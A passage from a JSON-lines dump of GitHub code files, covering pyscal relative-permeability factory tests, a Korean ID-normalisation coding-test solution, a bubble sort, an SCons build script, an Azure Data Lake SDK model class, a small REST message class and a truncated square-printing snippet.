PyscalFactory.load_relperm_df(\"wrongsatnum.csv\")\n\n # Missing SATNUMs, like merged cells:\n Path(\"mergedcells.csv\").write_text(\n \"CASE,SATNUM,nw,now\\nlow,,1,1\\nlow,1,2,2\\nlow,,3,32\", encoding=\"utf8\"\n )\n with pytest.raises(ValueError, match=\"Found not-a-number\"):\n PyscalFactory.load_relperm_df(\"mergedcells.csv\")\n\n # Missing SATNUMs, like merged cells:\n Path(\"mergedcellscase.csv\").write_text(\n \"CASE,SATNUM,nw,now\\n,1,1,1\\nlow,1,2,2\\n,1,3,32\", encoding=\"utf8\"\n )\n with pytest.raises(ValueError, match=\"Found not-a-number\"):\n PyscalFactory.load_relperm_df(\"mergedcellscase.csv\")\n\n # Not valid CSV file\n Path(\"notvalidcsv.csv\").write_text(\"SATNUM;nw;now\\n1;1;1\", encoding=\"utf-8\")\n with pytest.raises(TypeError, match=\"Supplied file is not a valid CSV file\"):\n PyscalFactory.load_relperm_df(\"notvalidcsv.csv\")\n\n\ndef test_many_nans():\n \"\"\"Excel or oocalc sometimes saves a xlsx file that gives all NaN rows and\n all-NaN columns, maybe some column setting that triggers Pandas to load\n them as actual columns/rows.\n\n Ensure we handle extra Nans in both directions\"\"\"\n nanframe = pd.DataFrame(\n [\n {\"SATNUM\": 1, \"nw\": 2, \"now\": 2, \"Unnamed: 15\": np.nan},\n {\"SATNUM\": np.nan, \"nw\": np.nan, \"now\": np.nan, \"Unnamed: 15\": np.nan},\n ]\n )\n wateroil_list = PyscalFactory.create_pyscal_list(\n PyscalFactory.load_relperm_df(nanframe)\n )\n assert len(wateroil_list) == 1\n sat_table_str_ok(wateroil_list.SWOF())\n\n\ndef test_xls_factory():\n \"\"\"Test/demonstrate how to go from data in an excel row to pyscal objects\n\n This test function predates the load_relperm_df() function, but can\n still be in here.\n \"\"\"\n testdir = Path(__file__).absolute().parent\n\n xlsxfile = testdir / \"data/scal-pc-input-example.xlsx\"\n\n scalinput = pd.read_excel(xlsxfile, engine=\"openpyxl\").set_index([\"SATNUM\", \"CASE\"])\n\n for (satnum, _), params in scalinput.iterrows():\n assert satnum\n wog = PyscalFactory.create_water_oil_gas(params.to_dict())\n swof = wog.SWOF()\n assert \"LET krw\" in swof\n assert \"LET krow\" in swof\n assert \"Simplified J\" in swof\n sgof = wog.SGOF()\n sat_table_str_ok(sgof)\n assert \"LET krg\" in sgof\n assert \"LET krog\" in sgof\n\n\ndef test_create_scal_recommendation_list():\n \"\"\"Test the factory methods for making scalrecommendation lists\"\"\"\n testdir = Path(__file__).absolute().parent\n scalfile_xls = testdir / \"data/scal-pc-input-example.xlsx\"\n scaldata = PyscalFactory.load_relperm_df(scalfile_xls)\n\n scalrec_list = PyscalFactory.create_scal_recommendation_list(scaldata)\n assert len(scalrec_list) == 3\n assert scalrec_list.pyscaltype == SCALrecommendation\n\n # Erroneous input:\n with pytest.raises(ValueError, match=\"Too many cases supplied for SATNUM 2\"):\n PyscalFactory.create_scal_recommendation_list(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"NW\", \"NOW\"],\n data=[\n [1, \"low\", 1, 1],\n [1, \"base\", 2, 2],\n [1, \"high\", 3, 3],\n [2, \"low\", 1, 1],\n [2, \"nearlylow\", 1.4, 1.2],\n [2, \"base\", 2, 2],\n [2, \"high\", 3, 3],\n ],\n )\n )\n with pytest.raises(ValueError, match=\"Too few cases supplied for SATNUM 2\"):\n PyscalFactory.create_scal_recommendation_list(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"NW\", \"NOW\"],\n data=[\n [1, \"low\", 1, 1],\n [1, \"base\", 2, 2],\n [1, \"high\", 3, 3],\n [2, \"low\", 1, 1],\n [2, \"high\", 3, 3],\n ],\n )\n )\n\n\ndef test_create_pyscal_list():\n \"\"\"Test the factory methods for making pyscal lists\"\"\"\n testdir = Path(__file__).absolute().parent\n scalfile_xls = testdir / \"data/scal-pc-input-example.xlsx\"\n scaldata = PyscalFactory.load_relperm_df(scalfile_xls)\n basecasedata = scaldata[scaldata[\"CASE\"] == \"base\"].reset_index()\n relpermlist = PyscalFactory.create_pyscal_list(basecasedata)\n assert len(relpermlist) == 3\n assert relpermlist.pyscaltype == WaterOilGas\n\n wo_list = PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Lg\", \"Eg\", \"Tg\", \"Log\", \"Eog\", \"Tog\"], axis=\"columns\")\n )\n\n assert len(wo_list) == 3\n assert wo_list.pyscaltype == WaterOil\n\n go_list = PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Lw\", \"Ew\", \"Tw\", \"Low\", \"Eow\", \"Tow\"], axis=\"columns\")\n )\n\n assert len(go_list) == 3\n assert go_list.pyscaltype == GasOil\n\n gw_list = PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Low\", \"Eow\", \"Tow\", \"Log\", \"Eog\", \"Tog\"], axis=\"columns\")\n )\n\n assert len(gw_list) == 3\n assert gw_list.pyscaltype == GasWater\n\n with pytest.raises(\n ValueError, match=\"Could not determine two or three phase from parameters\"\n ):\n PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Ew\", \"Eg\"], axis=\"columns\")\n )\n\n\ndef test_scalrecommendation():\n \"\"\"Testing making SCAL rec from dict of dict.\"\"\"\n pyscal_factory = PyscalFactory()\n\n scal_input = {\n \"low\": {\"nw\": 2, \"now\": 4, \"ng\": 1, \"nog\": 2},\n \"BASE\": {\"nw\": 3, \"NOW\": 3, \"ng\": 1, \"nog\": 2},\n \"high\": {\"nw\": 4, \"now\": 2, \"ng\": 1, \"nog\": 3},\n }\n scal = pyscal_factory.create_scal_recommendation(scal_input)\n\n with pytest.raises(ValueError, match=\"Input must be a dict\"):\n pyscal_factory.create_scal_recommendation(\"low\")\n\n # (not supported yet to make WaterOil only..)\n interp = scal.interpolate(-0.5)\n sat_table_str_ok(interp.SWOF())\n sat_table_str_ok(interp.SGOF())\n sat_table_str_ok(interp.SLGOF())\n sat_table_str_ok(interp.SOF3())\n check_table(interp.wateroil.table)\n check_table(interp.gasoil.table)\n\n # Check that we error if any of the parameters above is missing:\n for case in [\"low\", \"BASE\", \"high\"]:\n copy1 = scal_input.copy()\n del copy1[case]\n with pytest.raises(ValueError):\n pyscal_factory.create_scal_recommendation(copy1)\n\n go_only = scal_input.copy()\n del go_only[\"low\"][\"now\"]\n del go_only[\"low\"][\"nw\"]\n gasoil = pyscal_factory.create_scal_recommendation(go_only)\n assert gasoil.low.wateroil is None\n assert gasoil.base.wateroil is not None\n assert gasoil.high.wateroil is not None\n # SCALrecommendation of gasoil only works as long as you\n # don't try to ask for water data:\n assert \"SGFN\" in gasoil.interpolate(-0.4).SGFN()\n assert \"SWOF\" not in gasoil.interpolate(-0.2).SWOF()\n\n basehigh = scal_input.copy()\n del basehigh[\"low\"]\n with pytest.raises(ValueError, match='\"low\" case not supplied'):\n pyscal_factory.create_scal_recommendation(basehigh)\n\n baselow = scal_input.copy()\n del baselow[\"high\"]\n with pytest.raises(ValueError, match='\"high\" case not supplied'):\n pyscal_factory.create_scal_recommendation(baselow)\n\n with pytest.raises(\n ValueError, match=\"All values in parameter dict must be dictionaries\"\n ):\n pyscal_factory.create_scal_recommendation(\n {\"low\": [1, 2], \"base\": {\"swl\": 0.1}, \"high\": {\"swl\": 0.1}}\n )\n\n\ndef test_scalrecommendation_gaswater():\n \"\"\"Testing making SCAL rec from dict of dict for gaswater input\"\"\"\n pyscal_factory = PyscalFactory()\n\n scal_input = {\n \"low\": {\"nw\": 2, \"ng\": 1},\n \"BASE\": {\"nw\": 3, \"ng\": 1},\n \"high\": {\"nw\": 4, \"ng\": 1},\n }\n scal = pyscal_factory.create_scal_recommendation(scal_input, h=0.2)\n interp = scal.interpolate(-0.5, h=0.2)\n sat_table_str_ok(interp.SWFN())\n sat_table_str_ok(interp.SGFN())\n check_table(interp.wateroil.table)\n check_table(interp.gasoil.table)\n\n\ndef test_xls_scalrecommendation():\n \"\"\"Test making SCAL recommendations from xls data\"\"\"\n testdir = Path(__file__).absolute().parent\n\n xlsxfile = testdir / \"data/scal-pc-input-example.xlsx\"\n scalinput = pd.read_excel(xlsxfile, engine=\"openpyxl\").set_index([\"SATNUM\", \"CASE\"])\n for satnum in scalinput.index.levels[0].values:\n dictofdict = scalinput.loc[satnum, :].to_dict(orient=\"index\")\n scalrec = PyscalFactory.create_scal_recommendation(dictofdict)\n scalrec.interpolate(+0.5)\n\n\ndef test_no_gasoil():\n \"\"\"The command client does not support two-phase gas-oil, because\n that is most likely an sign of a user input error.\n (misspelled other columns f.ex).\n\n Make sure we fail in that case.\"\"\"\n dframe = pd.DataFrame(columns=[\"SATNUM\", \"NOW\", \"NG\"], data=[[1, 2, 2]])\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(dframe)\n\n\ndef test_check_deprecated_krowgend():\n \"\"\"Up until pyscal 0.5.x, krogend and krowend were parameters\n to the oil curve parametrization for WaterOil and GasOil. From\n pyscal 0.6.0, krogend and krowend are merged to kroend.\n After pyscal 0.8 presence of krogend and krowend is a ValueError\n \"\"\"\n with pytest.raises(ValueError):\n PyscalFactory.create_water_oil(dict(swl=0.1, nw=2, now=2, krowend=0.4))\n\n with pytest.raises(ValueError):\n PyscalFactory.create_gas_oil(dict(swl=0.1, ng=2, nog=2, krogend=0.4))\n\n # If krogend and kroend are both present, krogend is to be silently ignored\n # (random columns are in general accepted and ignored by pyscal)\n\n gasoil = PyscalFactory.create_gas_oil(\n dict(swl=0.1, ng=2, nog=2, krogend=0.4, kroend=0.3)\n )\n assert gasoil.table[\"KROG\"].max() == 0.3\n\n wateroil = PyscalFactory.create_water_oil(\n dict(swl=0.1, nw=2, now=2, krowend=0.4, kroend=0.3)\n )\n assert wateroil.table[\"KROW\"].max() == 0.3\n\n\ndef parse_gensatfuncline(conf_line):\n \"\"\"Utility function that emulates how gensatfunc could parse\n its configuration lines in a pyscalfactory compatible fashion\n\n Args:\n conf_line (str): gensatfunc config line\n Returns:\n dict\n \"\"\"\n\n # This is how the config line should be interpreted in terms of\n # pyscal parameters. Note that we are case insensitive in the\n # factory class\n line_syntax = [\n \"CMD\",\n \"Lw\",\n \"Ew\",\n \"Tw\",\n \"Lo\",\n \"Eo\",\n \"To\",\n \"Sorw\",\n \"Swl\",\n \"krwend\",\n \"steps\",\n \"perm\",\n \"poro\",\n \"a\",\n \"b\",\n \"sigma_costau\",\n ]\n\n if len(conf_line.split()) > len(line_syntax):\n raise ValueError(\"Too many items on gensatfunc confline\")\n\n params = {}\n for idx, value in enumerate(conf_line.split()):\n if idx > 0: # Avoid the CMD\n params[line_syntax[idx]] = float(value)\n\n # The 'steps' is not supported in pyscal, convert it:\n if \"steps\" in params:\n params[\"h\"] = 1.0 / params[\"steps\"]\n\n if \"krwend\" not in params: # Last mandatory item\n raise ValueError(\"Too few items on gensatfunc confline\")\n\n return params\n\n\ndef test_gensatfunc():\n \"\"\"Test how the external tool gen_satfunc could use\n the factory functionality\"\"\"\n\n pyscal_factory = PyscalFactory()\n\n # Example config line for gen_satfunc:\n conf_line_pc = \"RELPERM 4 2 1 3 2 1 0.15 0.10 0.5 20 100 0.2 0.22 -0.5 30\"\n\n wateroil = pyscal_factory.create_water_oil(parse_gensatfuncline(conf_line_pc))\n swof = wateroil.SWOF()\n assert \"0.17580\" in swof # krw at sw=0.65\n assert \"0.0127\" in swof # krow at sw=0.65\n assert \"Capillary pressure from normalized J-function\" in swof\n assert \"2.0669\" in swof # pc at swl\n\n conf_line_min = \"RELPERM 1 2 3 1 2 3 0.1 0.15 0.5 20\"\n wateroil = pyscal_factory.create_water_oil(parse_gensatfuncline(conf_line_min))\n swof = wateroil.SWOF()\n assert \"Zero capillary pressure\" in swof\n\n conf_line_few = \"RELPERM 1 2 3 1 2 3\"\n with pytest.raises(ValueError):\n parse_gensatfuncline(conf_line_few)\n\n # sigma_costau is missing here:\n conf_line_almost_pc = \"RELPERM 4 2 1 3 2 1 0.15 0.10 0.5 20 100 0.2 0.22 -0.5\"\n wateroil = pyscal_factory.create_water_oil(\n parse_gensatfuncline(conf_line_almost_pc)\n )\n swof = wateroil.SWOF()\n # The factory will not recognize the normalized J-function\n # when costau is missing. Any error message would be the responsibility\n # of the parser\n assert \"Zero capillary pressure\" in swof\n\n\ndef test_sufficient_params():\n \"\"\"Test the utility functions to determine whether\n WaterOil and GasOil object have sufficient parameters\"\"\"\n\n assert factory.sufficient_gas_oil_params({\"ng\": 0, \"nog\": 0})\n # If it looks like the user meant to create GasOil, but only provided\n # data for krg, then might error hard. If the user did not provide\n # any data for GasOil, then the code returns False\n with pytest.raises(ValueError):\n factory.sufficient_gas_oil_params({\"ng\": 0}, failhard=True)\n assert not factory.sufficient_gas_oil_params({\"ng\": 0}, failhard=False)\n assert not factory.sufficient_gas_oil_params({})\n with pytest.raises(ValueError):\n factory.sufficient_gas_oil_params({\"lg\": 0}, failhard=True)\n assert not factory.sufficient_gas_oil_params({\"lg\": 0}, failhard=False)\n assert factory.sufficient_gas_oil_params(\n {\"lg\": 0, \"eg\": 0, \"Tg\": 0, \"log\": 0, \"eog\": 0, \"tog\": 0}\n )\n\n assert factory.sufficient_water_oil_params({\"nw\": 0, \"now\": 0})\n with pytest.raises(ValueError):\n factory.sufficient_water_oil_params({\"nw\": 0}, failhard=True)\n assert not factory.sufficient_water_oil_params({})\n with pytest.raises(ValueError):\n factory.sufficient_water_oil_params({\"lw\": 0}, failhard=True)\n assert factory.sufficient_water_oil_params(\n {\"lw\": 0, \"ew\": 0, \"Tw\": 0, \"low\": 0, \"eow\": 0, \"tow\": 0}\n )\n\n\ndef test_sufficient_params_gaswater():\n \"\"\"Test that we can detect sufficient parameters\n for gas-water only\"\"\"\n assert factory.sufficient_gas_water_params({\"nw\": 0, \"ng\": 0})\n assert not factory.sufficient_gas_water_params({\"nw\": 0, \"nog\": 0})\n assert factory.sufficient_gas_water_params(dict(lw=0, ew=0, tw=0, lg=0, eg=0, tg=0))\n assert not factory.sufficient_gas_water_params(dict(lw=0))\n assert not factory.sufficient_gas_water_params(dict(lw=0, lg=0))\n assert not factory.sufficient_gas_water_params(dict(lw=0, lg=0))\n\n with pytest.raises(ValueError):\n factory.sufficient_gas_water_params(dict(lw=0), failhard=True)\n with pytest.raises(ValueError):\n factory.sufficient_gas_water_params({\"nw\": 3}, failhard=True)\n\n assert factory.sufficient_gas_water_params(dict(lw=0, ew=0, tw=0, ng=0))\n assert factory.sufficient_gas_water_params(dict(lg=0, eg=0, tg=0, nw=0))\n assert not factory.sufficient_gas_water_params(dict(lg=0, eg=0, tg=0, ng=0))\n\n\ndef test_case_aliasing():\n \"\"\"Test that we can use aliases for the CASE column\n in SCAL recommendations\"\"\"\n dframe = pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"pess\", 2, 2, 1, 1],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"opt\", 3, 1, 1, 1],\n ],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n PyscalFactory.create_scal_recommendation_list(relperm_data, h=0.2).interpolate(-0.4)\n dframe = pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"pessimistic\", 2, 2, 1, 1],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"optiMISTIc\", 3, 1, 1, 1],\n ],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n PyscalFactory.create_scal_recommendation_list(relperm_data, h=0.2).interpolate(-0.4)\n\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"FOOBAR\", 2, 2, 1, 1],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"optIMIstiC\", 3, 1, 1, 1],\n ],\n )\n )\n\n # Ambigous data:\n with pytest.raises(ValueError):\n amb = PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"low\", 2, 2, 1, 1],\n [1, \"pess\", 5, 5, 5, 5],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"optIMIstiC\", 3, 1, 1, 1],\n ],\n )\n )\n PyscalFactory.create_scal_recommendation_list(amb)\n\n # Missing a case\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[[1, \"base\", 3, 1, 1, 1], [1, \"optIMIstiC\", 3, 1, 1, 1]],\n )\n )\n # Missing a case\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[[1, \"base\", 3, 1, 1, 1]],\n )\n )\n\n\ndef test_socr_via_dframe():\n \"\"\"Test that the \"socr\" parameter is picked up from a dataframe/xlsx input\"\"\"\n p_list = PyscalFactory.create_pyscal_list(\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"Nw\", \"Now\", \"socr\"],\n data=[[1, 2, 2, 0.5]],\n )\n )\n )\n assert \"socr=0.5\" in p_list.SWOF()\n\n\ndef test_swirr_partially_missing(tmp_path):\n \"\"\"Test that swirr can be present for only a subset of the rows,\n and interpreted as zero when not there.\"\"\"\n dframe = pd.DataFrame(\n columns=[\n \"SATNUM\",\n \"Nw\",\n \"Now\",\n \"swl\",\n \"swirr\",\n \"a\",\n \"b\",\n \"poro_ref\",\n \"perm_ref\",\n \"drho\",\n ],\n data=[\n [1, 2, 2, 0.2, 0.1, 2, -2, 0.2, 100, 300],\n [2, 3, 3, 0.1, np.nan, np.nan, np.nan, np.nan, np.nan],\n ],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n p_list = PyscalFactory.create_pyscal_list(relperm_data, h=0.2)\n assert \"a=2, b=-2\" in p_list[1].pccomment\n assert p_list[2].pccomment == \"\"\n\n os.chdir(tmp_path)\n dframe.to_excel(\"partial_pc.xlsx\")\n relperm_data_via_xlsx = PyscalFactory.load_relperm_df(\"partial_pc.xlsx\")\n p_list = PyscalFactory.create_pyscal_list(relperm_data_via_xlsx, h=0.2)\n assert \"a=2, b=-2\" in p_list[1].pccomment\n assert p_list[2].pccomment == \"\"\n\n\ndef test_corey_let_mix():\n \"\"\"Test that we can supply a dataframe where some SATNUMs\n have Corey and others have LET\"\"\"\n dframe = pd.DataFrame(\n columns=[\"SATNUM\", \"Nw\", \"Now\", \"Lw\", \"Ew\", \"Tw\", \"Ng\", \"Nog\"],\n data=[[1, 2, 2, np.nan, np.nan, np.nan, 1, 1], [2, np.nan, 3, 1, 1, 1, 2, 2]],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n p_list = PyscalFactory.create_pyscal_list(relperm_data, h=0.2)\n swof1 = p_list.pyscal_list[0].SWOF()\n swof2 = p_list.pyscal_list[1].SWOF()\n assert \"Corey krw\" in swof1\n assert \"Corey krow\" in swof1\n assert \"LET krw\" in swof2\n assert \"Corey krow\" in swof2\n\n\ndef test_infer_tabular_file_format(tmp_path, caplog):\n \"\"\"Test code that infers the fileformat of files with tabular data\"\"\"\n testdir = Path(__file__).absolute().parent\n assert (\n factory.infer_tabular_file_format(testdir / \"data/scal-pc-input-example.xlsx\")\n == \"xlsx\"\n )\n assert (\n factory.infer_tabular_file_format(\n str(testdir / \"data/scal-pc-input-example.xlsx\")\n )\n == \"xlsx\"\n )\n assert (\n factory.infer_tabular_file_format(testdir / \"data/scal-pc-input-example.xls\")\n == \"xls\"\n )\n os.chdir(tmp_path)\n pd.DataFrame([{\"SATNUM\": 1, \"NW\": 2}]).to_csv(\"some.csv\", index=False)\n assert factory.infer_tabular_file_format(\"some.csv\") == \"csv\"\n\n Path(\"empty.csv\").write_text(\"\", encoding=\"utf8\")\n assert factory.infer_tabular_file_format(\"empty.csv\") == \"\"\n # Ensure Pandas's error message got through:\n assert \"No columns to parse from file\" in caplog.text\n\n # We don't want ISO-8859 files, ensure we fail\n norw_chars = \"Dette,er,en,CSV,fil\\nmed,iso-8859:,æ,ø,å\"\n Path(\"iso8859.csv\").write_bytes(norw_chars.encode(\"iso-8859-1\"))\n assert factory.infer_tabular_file_format(\"iso8859.csv\") == \"\"\n # Providing an error that this error was due to ISO-8859 and\n # nothing else is deemed too hard.\n Path(\"utf8.csv\").write_bytes(norw_chars.encode(\"utf-8\"))\n assert factory.infer_tabular_file_format(\"utf8.csv\") == \"csv\"\n\n # Write some random bytes to a file, this should with very\n # little probability give a valid xlsx/xls/csv file.\n Path(\"wrong.csv\").write_bytes(os.urandom(100))\n assert factory.infer_tabular_file_format(\"wrong.csv\") == \"\"\n\n\n@pytest.mark.parametrize(\n \"orig_dict, keylist, expected_dict\",\n [\n ({}, [], {}),\n ({\"foo\": 1}, [], {}),\n ({\"foo\": 1}, [\"fo\"], {}),\n ({\"foo\": 1}, [\"foo\"], {\"foo\": 1}),\n ({}, [\"foo\"], {}),\n ],\n)\ndef test_slicedict(orig_dict, keylist, expected_dict):\n \"\"\"Test that dictionaries can be sliced for subsets\"\"\"\n assert factory.slicedict(orig_dict, keylist) == expected_dict\n","repo_name":"equinor/pyscal","sub_path":"tests/test_factory.py","file_name":"test_factory.py","file_ext":"py","file_size_in_byte":46308,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"52"} +{"seq_id":"27426302566","text":"import re\ndup = re.compile('([a-z0-9-_.]+)') # 소문자,숫자,특수문자 정규식\n\n\nid = input().lower() # 소문자로\nm = dup.findall(id) # 정규식에 맞는 부분을 모두 찾아 리스트로 리턴\nid = \"\".join(m) # 합침\n#print(m)\n\nconti = re.compile('([.]{2,})') # .이 2번 이상 반복되는 경우의 정규식\nm = conti.findall(id)\nfor i in m: # 매칭되는 부분 반복\n id = id.replace(i,\".\",1) # 문자열 대체 마지막 1은 치환할 개수(없으면 해당 되는 모든거 치환함)\n#print(id)\n\nfirst_dot_check = re.compile('(^[.]+)|([.]+$)') # 맨앞과 맨끛에 . 있는지 체크\nid = first_dot_check.sub(\"\",id) # 치환\n\n#print(id)\nif(id == \"\"):\n id = \"a\"\n\nif(len(id)>=16): # 길이 16이상일때\n id = id[:15]\n id = first_dot_check.sub(\"\",id)\nif(len(id)<=2):\n last = id[-1]\n while(len(id)!=3):\n id += last\n\nprint(id)","repo_name":"dlckdduq1107/coding_test","sub_path":"Solutions/하루 한문제 코테준비/new_id_recommend_programmers_72410.py","file_name":"new_id_recommend_programmers_72410.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17927882886","text":"\r\ndef bubbleSort(lst):\r\n '''\r\n This takes time of O(n^2)\r\n '''\r\n n = len(lst)\r\n for i in range(1,n):\r\n for j in range(0, n-1):\r\n key = lst[j + 1]\r\n if lst[j] > lst[j + 1]:\r\n lst[j + 1] = lst[j]\r\n lst[j] = key\r\n return lst\r\n \r\nprint(bubbleSort([5,2,1,4,6,3]))\r\n","repo_name":"SiddhantBhardwaj2018/Data-Structures-and-Algorithms-in-Python","sub_path":"Bubble Sort.py","file_name":"Bubble Sort.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38575618193","text":"from SCons.Script import *\nfrom os import access, environ, X_OK\nimport platform\n\n#CacheDir('.scons-cache')\nDecider('MD5-timestamp')\nSetOption('implicit_cache', True)\nSourceCode('.', None)\n\n\n########################################################################\n#\n# various command-line options\n#\n\ndef pathIsExecutable(key, val, env):\n found = env.WhereIs(val)\n if found: val = found\n PathVariable.PathIsFile(key, val, env)\n if not access(val, X_OK):\n raise SCons.Errors.UserError('Path for option %s is not executable: %s' % (key, val))\n\nopts = Variables(['.scons-options'], ARGUMENTS)\nopts.Add(BoolVariable('DEBUG', 'Compile with extra information for debugging', False))\nopts.Add(BoolVariable('OPTIMIZE', 'Compile with optimization', False))\nopts.Add(BoolVariable('NATIVECAML', 'Use the native-code OCaml compiler', True))\nopts.Add(BoolVariable('PROFILE', 'Turn on performance profiling', False))\nopts.Add(BoolVariable('VALGRIND', \"Run tests under Valgrinds's memory checker\", False))\nopts.Add(PathVariable('LLVM_CONFIG', 'Path to llvm-config executable', WhereIs('llvm-config'), pathIsExecutable))\n\n\n\n\nif platform.system() == 'Darwin':\n Is64 = False\nelse:\n Is64 = platform.architecture()[0] == '64bit'\n\nenv = Environment(\n\t\tCCFLAGS = ['-Isrc/lib'],\n options=opts,\n Is64=Is64,\n )\n\nenv.PrependENVPath('PATH', [\n '/home/rubio/build-llvm/Release/bin',\n '/usr/local/bin',\n '/opt/local/bin',\n '/unsup/ocaml/bin',\n '/s/texlive-2008/bin',\n '/s/std/bin',\n ])\n\n\n########################################################################\n#\n# basic LaTeX document rendering\n#\n\nenv.AppendUnique(\n COMMONLATEXFLAGS=['-file-line-error', '-interaction=batchmode'],\n LATEXFLAGS='$COMMONLATEXFLAGS',\n PDFLATEXFLAGS='$COMMONLATEXFLAGS',\n BIBTEXFLAGS='-terse',\n )\n\n\n########################################################################\n#\n# shared compiliation flags\n#\n\nflags = [\n '-Wall',\n '-Wformat=2',\n '-Wextra',\n '-Werror',\n '${(\"\", \"-g\")[DEBUG]}',\n '${(\"\", \"-O\")[OPTIMIZE]}',\n ]\n\nenv.AppendUnique(\n CCFLAGS=flags,\n LINKFLAGS=flags,\n )\n\n\n########################################################################\n#\n# subsidiary scons scripts\n#\n\nSConscript(\n dirs=[\n # our stuff\n\t'src',\n ],\n exports='env',\n )\n","repo_name":"corvette-berkeley/precimonious","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"52"} +{"seq_id":"16289885395","text":"from msrest.serialization import Model\n\n\nclass DataLakeStoreAccountUpdateParameters(Model):\n \"\"\"Data Lake Store account information to update.\n\n :param tags: Resource tags\n :type tags: dict\n :param firewall_state: The current state of the IP address firewall for\n this Data Lake store account. Disabling the firewall does not remove\n existing rules, they will just be ignored until the firewall is\n re-enabled. Possible values include: 'Enabled', 'Disabled'\n :type firewall_state: str or :class:`FirewallState\n `\n :param trusted_id_provider_state: The current state of the trusted\n identity provider feature for this Data Lake store account. Disabling\n trusted identity provider functionality does not remove the providers,\n they will just be ignored until this feature is re-enabled. Possible\n values include: 'Enabled', 'Disabled'\n :type trusted_id_provider_state: str or :class:`TrustedIdProviderState\n `\n :param default_group: the default owner group for all new folders and\n files created in the Data Lake Store account.\n :type default_group: str\n :param new_tier: the commitment tier to use for next month. Possible\n values include: 'Consumption', 'Commitment_1TB', 'Commitment_10TB',\n 'Commitment_100TB', 'Commitment_500TB', 'Commitment_1PB', 'Commitment_5PB'\n :type new_tier: str or :class:`TierType\n `\n :param firewall_allow_azure_ips: The current state of allowing or\n disallowing IPs originating within Azure through the firewall. If the\n firewall is disabled, this is not enforced. Possible values include:\n 'Enabled', 'Disabled'\n :type firewall_allow_azure_ips: str or :class:`FirewallAllowAzureIpsState\n `\n :param encryption_config: Used for rotation of user managed Key Vault\n keys. Can only be used to rotate a user managed encryption Key Vault key.\n :type encryption_config: :class:`UpdateEncryptionConfig\n `\n \"\"\"\n\n _attribute_map = {\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'firewall_state': {'key': 'properties.firewallState', 'type': 'FirewallState'},\n 'trusted_id_provider_state': {'key': 'properties.trustedIdProviderState', 'type': 'TrustedIdProviderState'},\n 'default_group': {'key': 'properties.defaultGroup', 'type': 'str'},\n 'new_tier': {'key': 'properties.newTier', 'type': 'TierType'},\n 'firewall_allow_azure_ips': {'key': 'properties.firewallAllowAzureIps', 'type': 'FirewallAllowAzureIpsState'},\n 'encryption_config': {'key': 'properties.encryptionConfig', 'type': 'UpdateEncryptionConfig'},\n }\n\n def __init__(self, tags=None, firewall_state=None, trusted_id_provider_state=None, default_group=None, new_tier=None, firewall_allow_azure_ips=None, encryption_config=None):\n self.tags = tags\n self.firewall_state = firewall_state\n self.trusted_id_provider_state = trusted_id_provider_state\n self.default_group = default_group\n self.new_tier = new_tier\n self.firewall_allow_azure_ips = firewall_allow_azure_ips\n self.encryption_config = encryption_config\n","repo_name":"EnjoyLifeFund/macHighSierra-cellars","sub_path":"azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/datalake/store/models/data_lake_store_account_update_parameters.py","file_name":"data_lake_store_account_update_parameters.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13300859710","text":"# -*- coding: utf-8 -*-\n\n\nclass RestMessage(object):\n def __init__(self, status, items=None, links=None, *args, **kwargs):\n super(RestMessage, self).__init__(*args, **kwargs)\n\n self.status = status\n self.items = items\n self.links = links\n","repo_name":"linkdd/link.rest","sub_path":"link/rest/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3970387487","text":"# Meminta masukan bilangan bulat dari pengguna\nsize = int(input(\"Masukkan sebuah bilangan bulat: \"))\n\n# Mencetak persegi dengan ukuran sesuai dengan masukan pengguna\nfor i in range(size):\n for j in range(size):\n # Mencetak '#' dipisahkan spasi\n print('#', end=' ')\n # 